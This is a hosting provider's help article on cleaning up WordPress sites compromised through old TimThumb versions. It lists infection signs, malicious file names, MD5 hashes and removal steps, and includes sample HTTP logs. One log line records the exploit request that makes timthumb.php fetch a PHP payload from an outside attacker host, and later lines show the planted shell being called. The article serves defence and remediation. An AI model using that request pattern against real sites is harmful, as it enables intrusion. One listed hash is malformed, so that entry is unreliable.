Home Guides Glossary

WordPress Compromise: TimThumb

TimThumb is a tool used by WordPress themes and plugins to resize images. Old versions of TimThumb have a security vulnerability that lets attackers upload malicious ("bad") files from another website. The first bad file then lets the attacker upload more malicious files to the hosting account.

  • You can get more information about compromises and how to deal with them in What if my website is hacked?.

  • Signs You've Been Compromised

  • Besides the signs mentioned in What if my website is hacked?, you can tell your Website has been affected by this specific compromise if your account contains the files with the following patterns in a plugin directory:

    • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
    • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php

    You can find examples of possible md5 hashes in the MD5SUMS of Known Malicious Files section of this article.

    You might also find the following files in your website's root directory (more info):

    • x.txt
    • logx.txt

    Remedies

    You must remove all of the compromised and bad files. Before deleting anything, we recommend making a backup of your website (more info).

    Locating Bad Files

    The bad files that are initially uploaded through the TimThumb vulnerability will typically be located in one of the following directories, which are located in the /theme or /plugin directory that contains the vulnerable TimThumb file.

    • /tmp
    • /cache
    • /images

    Examples of bad files' locations:

    [webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

    Examples of bad files' names in these locations:

    • ef881b33fba49bd6ad1818062d071a9c.php
    • db648d44074f33a8857066b97290d247.php
    • 3cf739debc9340540c923bbf3b73044b.php
    • dc33a2e36d3179a06278191088c2ef35.php
    • 8377cb73d30655dc2cbf906c9310da56.php
    • eb117b212e2906f52c0a0c9132c6c07a.php
    • a4924ec23939d2410354efbb8d4ddd06.php
    • vvv3.php
    • ea90e1e4d7ba30848f70b13d616c6ed4.php
    • 236268f2a06e4153365b998d13934eb9.php
    • 6a4fa516943e2fa09e3704486075de9f.php
    • 896c4eb4ff2581f6e623db1904b80a44.php
    • wp-images.php

    The files x.txt and logx.txt will contain information about when a bad file was created using the TimThumb vulnerability and the location of the bad file within the hosting account. This information is helpful in determining what files need to be removed and where to find them. However, it is not likely that this will provide a complete list of files that need to be removed.

    An example:

    Day : Thu, 11 Apr 2013 06:21:15 -0700
    IP: X.X.X.X
    Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
    Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

    Files to Remove

    After you've create a backup of your Website, remove the following files:

    • x.txt
    • logx.txt
    • external_[md5 hash].php — for example: external_dc8e1cb5bf0392f054e59734fa15469b.php
    • [md5 hash].php — for example: 7eebe45bde5168488ac4010f0d65cea8.php
    • Other malicious PHP files found with the md5 hash named files.

    You can do this via FTP (more info) or through the file manager within the control panel for your hosting account (more info).

    You should also:

    • Update all of your themes and plugins to the latest version.
    • Replace any instance of TimThumb.php with the newest version found athere.

    Technical Info

    Sample of HTTP Logs

    x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
    x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

    MD5SUMS of Known Malicious Files

    • 2c4bcdc6bee98ed4dd55e0d35564d870
    • 10069c51da0c87ad904d602beb9e7770
    • 8855aecb5c45a5bfd962b4086c8ff96a
    • 526a4cf1f66f27a959a39019fdf1fae9
    • 161d2e53c664bd0fe1303017a145b413
    • 39f186a0f55b04c651cbff6756a64ccc
    • f67ca8f0bac08f5e8ccab6013b7acf70
    • 747c7afcda0eef0eff6ed6838494c32
    • cfdf59a58057b62f4707b909bcbd4577

    Additional Malicious Files

    • wp-script.php
    • wp-images.php
    • vvv3.php
    • data.php

    Domain Registration

    Pay less for website domain names. Register your own .com, .net or .org for as low as $10.18 per year. We have everything you need to get online with your new domain.

    Website Builder

    For as little as $3.89 per month you can build your Website online with Website Builder using our easy to use professional templates. Play Video - Demo

    Quick Shopping Cart

    Build and run your own successful online store in minutes. You're just five easy steps away! Shopping Cart works with Google® and eBay® Play Video

    Website Hosting

    Everything needed to give your website the high-performance home it deserves.  Protect transactions and secure your customer's data with a SSL Certificate

    Copyright © 2005 - 2017. All rights reserved. Privacy Policy